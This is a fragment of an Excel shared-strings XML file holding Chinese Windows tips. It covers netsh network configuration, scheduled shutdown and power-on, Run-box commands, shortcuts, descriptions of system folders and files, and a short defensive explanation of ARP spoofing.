        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址、掩码地址、网关地址等。而在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设置模式下，你能查看到各种网络配置信息。例如，执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>show config</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令后，你除了可以看到“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Ipconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令能查询的信息外，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>还能知道网关跃点数是多少，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器是什么，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>WINS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器是什么等。执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>show tcpconn</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>你能查看到当前有哪些</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Internet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机，与本地机器建立了连接，也可以查看到本地端口的工作状态，是处于关闭状态还是监听状态（如图</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>所示）。灵活运用该命令，你能及时发现系统是否受到了外来入侵</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，要是有陌生的主机与本地主机的陌生端口，建立了连接时，那系统十有八九受到了攻击，此时你必须尽快采取措施，确保系统安全。当然，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Netsh</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>还为你提供了许多查询网络信息的命令，例如查询</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>统计信息的命令，查询</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TCP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>统计信息的命令，查询</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>UDP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ICMP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>统计信息的命令等，这些命令使用都比较简单，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在这里就不一一详细介绍了。</t>
    </r>
  </si>
  <si>
    <r>
      <t>快速修改配置：倘若你的笔记本电脑，需要在不同的网络环境中工作，那么每次工作之前，总需要重新修改网络参数，这实在太麻烦了。现在，你可以在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Netsh</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模式下，很轻松地</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>实现快速修改网络配置的目的，具体步骤为：在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令行状态下，输入字符串命令“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netsh -c interface dump&gt;c:\net1.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，单击回车键后，当前工作站的网络配置信息，就全部被保存到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> net1.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件中了（该文件保存着网络</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环境中的上网参数）；下面，打开</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>net1.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件，你可以看到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>如图</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>所示的配置信息，包括工作站的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址、掩码</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址、网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址等。现在，你可以用笔记本电</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脑可能使用到的其他网络环境中的配置参数，替换这里的对应参数，其余内容保持不变，然后再将该文</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>本文件另存为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>net2.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”（该文件保存着网络</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环境中的上网参数）；同样地，你可以生成</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">net3.txt </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>net4.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>……</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netn.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，让这些文件保存着网络</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、网络</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>……网络</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>n</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环境中的上网参数。以后，笔记</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>本电脑无论接入到哪个网络环境中，只要在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令行状态下，执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netsh exec c:\netn.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”命令</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，就能实现快速修改网络配置的目的了（这里的“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netn.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”文件，必须对应着指定的网络环境）。</t>
    </r>
  </si>
  <si>
    <t>ARP欺骗与防止</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARP欺骗与防止</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARP攻击（百度百科）</t>
  </si>
  <si>
    <t>ARP防火墙（百度百科）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1定时关机</t>
  </si>
  <si>
    <t>1.1 使用shutdown命令</t>
  </si>
  <si>
    <t>　　 shutdown.exe -f　　　　　　　　 强行关闭应用程序。</t>
  </si>
  <si>
    <t>　　 shutdown.exe -m \\计算机名　　　控制远程计算机。</t>
  </si>
  <si>
    <t>　　 shutdown.exe -i　　　　　　　　 显示图形用户界面，但必须是Shutdown的第一个参数。　　</t>
  </si>
  <si>
    <t>　　 shutdown.exe -l　　　　　　　　 注销当前用户。</t>
  </si>
  <si>
    <t>　　 shutdown.exe -r　　　　　　　　 关机并重启。</t>
  </si>
  <si>
    <t>　　比如你的电脑要在23:00关机，可以选择“开始→运行”，输入“at 23:00 Shutdown -s”，这样，到了23点，电脑就会出现“系统关机”对话框，默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机，可以输入“Shutdown.exe -s -t 3600”，这里表示60分钟后自动关机，“3600”代表60分钟。</t>
  </si>
  <si>
    <t>　　如果想取消的话，可以在运行中输入“shutdown -a”。另外输入“shutdown -i”，则可以打开设置自动关机对话框，对自动关机进行设置。</t>
  </si>
  <si>
    <t>　　虽然shutdown.exe是Windows XP下的程序，在Windows2000中是调用Windows下System中的Shell32.dll文件来实现关机的，例如“indir\RunDLL32.exe indir\System\Shell32.dll，SHExitWindowsEx 8”，但在Win2000也可利用它，方法如下：</t>
  </si>
  <si>
    <t>　　在WinXP安装目录下的System32文件夹中找到Shutdown.exe，将它复制到Win2000安装目录下的System32文件夹中，在“运行”中输入“Shutdown.exe”，即可像在Windows XP中一样使用该程序了。</t>
  </si>
  <si>
    <t>1.2 利用任务计划：</t>
  </si>
  <si>
    <t>单击“开始”按钮，在“开始”菜单中选择“程序”选项，在“程序”中选择“附件”，再在“附件”中选择“系统工具”，在“系统工具”中选择“计划任务”命令，这时就打开了“计划任务”窗口，在该窗口中，点击“添加已计划的任务”进入“计划任务”向导。按照提示点击“下一步”后，再点击“浏览”按钮，找到“C:\Windows\Rundll32.exe”打开，然后根据自己的需求设置任务执行的方式，如每天或每周。最后设置好这个任务开始的时间和开始的日期，点击“完成”按钮就会在计划任务窗口出现“Rundll32”这个计划任务名。 这个计划任务还需要进行属性的修改设置，在计划任务窗口，双击“Rundll32”打开属性窗口，在“运行”栏中把原有的内容修改为：C:\WINDOWS\Rundll32.exe user.exe,exitwindows。注意user.exe和exitwindows之间的“，”必须为英文半角，且其前后不能有“空格”。</t>
  </si>
  <si>
    <t>终于完成了，以后开关机就可以都自动了！！</t>
  </si>
  <si>
    <t>2 定时开机</t>
  </si>
  <si>
    <t>计算机启动时按“Delete”键进入BIOS界面。在BIOS设置主界面中选择“Power Management Setup”菜单，进入电源管理窗口。默认情况下，“Resume By Alarm）选项是关闭的，也就是disable的，将光标移到该项，用PageUp或PageDown翻页键或按enter键，选择Enabled,将“Disabled”改为“Enabled”，再在”Date （of Month） Alarm”和“Time （hh:mm:ss） Alarm”中设定开机的日期和时间。</t>
  </si>
  <si>
    <t>注意如果你把“Date”设为0，则默认为每天定时开机。设置好后按“F10“保存设置就可以了，机器会重新启动，而你的自动开机设置也便大功告成了。不过不同的主板在设置上会不尽相同，但都大同小异。，你只要安装这里的相关介绍并且对照主板说明书操作的话应该是没有任何问题 的。随便说一下，利用自动开机我们就可以用电脑来做闹钟了，你可以把开机时间设为你要起床的时间，然后把MP3拖放到“启动”里面，这样就可以自动放音乐了，用音乐来唤醒你。试试吧！</t>
  </si>
  <si>
    <t>定时开关机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>启动计算器</t>
  </si>
  <si>
    <t>logoff</t>
  </si>
  <si>
    <t>注销命令</t>
  </si>
  <si>
    <t>notepad</t>
  </si>
  <si>
    <t>打开记事本</t>
  </si>
  <si>
    <t>charmap</t>
  </si>
  <si>
    <t>启动字符映射表</t>
  </si>
  <si>
    <t>系统配置实用程序</t>
  </si>
  <si>
    <t>osk</t>
  </si>
  <si>
    <t>打开屏幕键盘</t>
  </si>
  <si>
    <t>write</t>
  </si>
  <si>
    <t>写字板</t>
  </si>
  <si>
    <t>CMD命令提示符</t>
  </si>
  <si>
    <t>Msinfo32</t>
  </si>
  <si>
    <t>系统信息</t>
  </si>
  <si>
    <t>注册表</t>
  </si>
  <si>
    <t>Powercfg –h on</t>
  </si>
  <si>
    <t>打开休眠</t>
  </si>
  <si>
    <t>compmgmt.msc</t>
  </si>
  <si>
    <t>计算机管理</t>
  </si>
  <si>
    <t>mspaint</t>
  </si>
  <si>
    <t>画图板</t>
  </si>
  <si>
    <t>系统还原</t>
  </si>
  <si>
    <t>eudcedit</t>
  </si>
  <si>
    <t>造字程序</t>
  </si>
  <si>
    <t>narrator</t>
  </si>
  <si>
    <t>屏幕“讲述人”</t>
  </si>
  <si>
    <t>sfc /scannow</t>
  </si>
  <si>
    <t>扫描错误并复原</t>
  </si>
  <si>
    <t>查看网关IP对应的正确MAC地址</t>
  </si>
  <si>
    <t>I</t>
  </si>
  <si>
    <t>E</t>
  </si>
  <si>
    <t>将arp缓存中的内容删空，计算机可暂时恢复上网（攻击如果不停止的话），一旦能上网就立即将网络断掉（禁用网卡或拔掉网线），再运行arp –a;　ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl+Tab</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>切换选项卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>End</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F6</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PageDown</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>向文档开始处滚动</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>向文档结尾处滚动</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一、文件夹篇</t>
  </si>
  <si>
    <t>二、文件篇</t>
  </si>
  <si>
    <t>这里记录的是Window的用户以及这些用户个人设定的开始菜单及桌面等信息。</t>
  </si>
  <si>
    <t>Command</t>
  </si>
  <si>
    <t>在这个目录下有着许多的DOS的常用命令，例如debug，</t>
  </si>
  <si>
    <t>format等</t>
  </si>
  <si>
    <t>可别小看这些老廉颇呀，在许多关键时刻还得靠他们哟。</t>
  </si>
  <si>
    <t>Config</t>
  </si>
  <si>
    <t>用于存放Windows中硬件配制文件。</t>
  </si>
  <si>
    <t>Cursors</t>
  </si>
  <si>
    <t>这是存放Windows光标的目录。</t>
  </si>
  <si>
    <t>Desktop</t>
  </si>
  <si>
    <t>该目录存放上网下载东东时的临时文件。</t>
  </si>
  <si>
    <t>Favorites</t>
  </si>
  <si>
    <t>存放收藏夹的内容。</t>
  </si>
  <si>
    <t>Fonts</t>
  </si>
  <si>
    <t>Help</t>
  </si>
  <si>
    <t>存放Windows帮助文件。</t>
  </si>
  <si>
    <t>Media</t>
  </si>
  <si>
    <t>Arp.exe</t>
  </si>
  <si>
    <t>TCP/IP地址解析工具。</t>
  </si>
  <si>
    <t>Ping.exe</t>
  </si>
  <si>
    <t>Winrep.exe</t>
  </si>
  <si>
    <t>ASPICD.SYS</t>
  </si>
  <si>
    <t>SCSI光驱的的ASPI驱动程序。（必须先运行aspi_dos驱动程序，这个文件只对于那些使用SCSI的用户有用）</t>
  </si>
  <si>
    <t>Autoexec.bat</t>
  </si>
  <si>
    <t>系统启动时自动运行的批处理文件。</t>
  </si>
  <si>
    <t>CDSETUP.exe</t>
  </si>
  <si>
    <t>DOS声卡驱动程序带的旧文件。</t>
  </si>
  <si>
    <t>COMMAND.COM</t>
  </si>
  <si>
    <t>系统启动所必须的文件。（不要删除）</t>
  </si>
  <si>
    <t>CONFIG.SYS</t>
  </si>
  <si>
    <t>用于载入设备驱动程序的配置文件。</t>
  </si>
  <si>
    <t>DEFRAG.EXE</t>
  </si>
  <si>
    <t>用于DOS下清楚碎片的文件。</t>
  </si>
  <si>
    <t>DELTREE.EXE</t>
  </si>
  <si>
    <t>删除目录的命令。</t>
  </si>
  <si>
    <t>DISCOPY.COM</t>
  </si>
  <si>
    <t>磁盘复制的命令。</t>
  </si>
  <si>
    <t>DRVSPACE.BIN</t>
  </si>
  <si>
    <t>当你制作启动盘的时候，Windows自动生成的文件。</t>
  </si>
  <si>
    <t>EDIT.COM</t>
  </si>
  <si>
    <t>用于在DOS下进行编辑的命令文件。</t>
  </si>
  <si>
    <t>FDISK.EXE</t>
  </si>
  <si>
    <t>用于硬盘分区的命令文件。</t>
  </si>
  <si>
    <t>FIND.EXE</t>
  </si>
  <si>
    <t>在文件、路径或者是驱动器中查找字符的命令。</t>
  </si>
  <si>
    <t>formAT.COM</t>
  </si>
  <si>
    <t>IO.SYS</t>
  </si>
  <si>
    <t>启动时必须的系统文件。（不要删除）</t>
  </si>
  <si>
    <t>MORE.COM</t>
  </si>
  <si>
    <t>MOUSE.COM</t>
  </si>
  <si>
    <t>鼠标驱动程序文件。（我并不使用该文件，但保留着以防万一要用上）</t>
  </si>
  <si>
    <t>MSCDEX.EXE</t>
  </si>
  <si>
    <t>光驱的DOS文件。</t>
  </si>
  <si>
    <t>MSDOS.SYS</t>
  </si>
  <si>
    <t>SBCD.SYS</t>
  </si>
  <si>
    <t>ntfrs.exe</t>
  </si>
  <si>
    <t>在多个服务器间维护文件目录内容的文件同步。(系统服务)</t>
  </si>
  <si>
    <t>RsSub.exe</t>
  </si>
  <si>
    <t>控制用来远程储存数据的媒体。(系统服务)</t>
  </si>
  <si>
    <t>locator.exe</t>
  </si>
  <si>
    <t>lserver.exe</t>
  </si>
  <si>
    <t>注册客户端许可证。(系统服务)</t>
  </si>
  <si>
    <t>dfssvc.exe</t>
  </si>
  <si>
    <t>管理分布于局域网或广域网的逻辑卷。(系统服务)</t>
  </si>
  <si>
    <t>clipsrv.exe</t>
  </si>
  <si>
    <t>支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。(系统服务)</t>
  </si>
  <si>
    <t>msdtc.exe</t>
  </si>
  <si>
    <t>并列事务，是分布于两个以上的数据库，消息队列，文件系统，或其它事务保护资源管理器。</t>
  </si>
  <si>
    <t>History</t>
  </si>
  <si>
    <t>默认状态时可以保留你近二十天来的IE操作记录。</t>
  </si>
  <si>
    <t>Web</t>
  </si>
  <si>
    <t>Recent</t>
  </si>
  <si>
    <t>这是对应开始菜单中文档菜单下的文档调用历史记录。它会把你最近打开的文档和图片的路径记录下来，方便用户快速打开最近使用的文档。</t>
  </si>
  <si>
    <t>SendTo</t>
  </si>
  <si>
    <t>对应Windows的开始菜单，可以直接在改目录对开始菜单进行管理。</t>
  </si>
  <si>
    <t>开始菜单的程序。</t>
  </si>
  <si>
    <t>自动运行。</t>
  </si>
  <si>
    <t>INF</t>
  </si>
  <si>
    <t>INF驱动程序脚本文件夹。</t>
  </si>
  <si>
    <t>OTHER</t>
  </si>
  <si>
    <t>INF其它驱动程序脚本文件夹。</t>
  </si>
  <si>
    <t>Wallpaper</t>
  </si>
  <si>
    <t>网页背景文件夹。</t>
  </si>
  <si>
    <t>SYSBCKUP</t>
  </si>
  <si>
    <t>系统文件备份文件夹。</t>
  </si>
  <si>
    <t>System和System32</t>
  </si>
  <si>
    <t>这是两个很重要的系统文件夹，存放Windows的系统文件和硬件驱动程序等重要信息。</t>
  </si>
  <si>
    <t>Tasks</t>
  </si>
  <si>
